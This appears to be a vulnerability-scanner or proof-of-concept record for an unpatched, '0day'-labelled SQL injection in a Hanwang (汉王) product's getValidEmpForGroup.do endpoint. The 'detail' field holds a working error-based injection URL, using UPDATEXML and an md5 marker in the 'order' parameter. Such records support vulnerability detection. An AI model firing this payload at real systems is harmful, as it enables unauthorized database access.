vendor = "汉王"
name = "汉王getValidEmpForGroup.do SQL注入"
type = "SQL注入"
version = "未知"
path = "/manage/authMultiplePeople/getValidEmpForGroup.do"
detail = "/manage/authMultiplePeople/getValidEmpForGroup.do?recoToken=67mds2pxXQb&page=1&pageSize=10&order=(UPDATEXML(2920,CONCAT(0x7e,md5(123456),0x7e,(SELECT+(ELT(123=123,1)))),8357))"
fix = "未知"
date = "0710"
label = "0day"
verifier = "sxf"
